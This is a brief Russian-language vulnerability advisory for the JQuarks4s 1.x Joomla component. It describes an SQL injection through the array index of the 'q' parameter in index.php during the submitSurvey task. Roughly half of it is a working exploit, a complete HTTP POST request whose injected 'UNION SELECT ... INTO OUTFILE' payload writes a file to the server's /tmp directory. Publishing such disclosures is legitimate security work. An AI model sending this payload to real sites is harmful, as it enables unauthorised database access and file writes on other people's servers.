Программа: JQuarks4s 1.x (component for Joomla!)

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре индекса массива "q" сценарием index.php
(когда "option" установлен в "com_jquarks4s", "task" установлен в "submitSurvey",
и "q" установлен в "4"). Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.

Эксплоит:

POST /path/index.php HTTP/1.1
Host: target
Content-Type: application x-www-form-urlencoded
Content-Length: 97

option=com_jquarks4s&task=submitSurvey&q[-1 UNION SELECT 0x414141 INTO OUTFILE
'/tmp/trycopy' ]=4



Оставить мнение